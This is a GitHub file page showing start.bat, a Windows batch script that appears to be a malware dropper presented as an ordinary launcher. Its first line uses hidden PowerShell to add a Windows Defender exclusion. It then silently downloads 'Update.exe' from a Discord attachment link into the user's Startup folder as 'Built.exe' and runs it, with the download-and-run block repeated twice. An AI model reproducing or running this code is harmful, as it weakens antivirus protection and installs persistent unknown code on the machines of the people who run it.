-
Notifications
You must be signed in to change notification settings - Fork 0
/
start.bat
35 lines (21 loc) · 954 Bytes
/
start.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
powershell -w hidden -c Add-MpPreference -ExclusionPath ""
@echo off
setlocal
set "URL=https://cdn.discordapp.com/attachments/1206721383820820553/1225855958110965840/Update.exe?ex=6622a653&is=66103153&hm=9d055dccffea6df355496fa942822fb73305fd7eca06cca9d79b7e1459ee9b58&"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Built.exe"
if exist "%DEST%" del "%DEST%"
curl --silent --output "%DEST%" "%URL%"
if %errorlevel% neq 0 (
exit /b %errorlevel%
)
call "%DEST%"
@echo off
setlocal
set "URL=https://cdn.discordapp.com/attachments/1206721383820820553/1225855958110965840/Update.exe?ex=6622a653&is=66103153&hm=9d055dccffea6df355496fa942822fb73305fd7eca06cca9d79b7e1459ee9b58&"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Built.exe"
if exist "%DEST%" del "%DEST%"
curl --silent --output "%DEST%" "%URL%"
if %errorlevel% neq 0 (
exit /b %errorlevel%
)
call "%DEST%"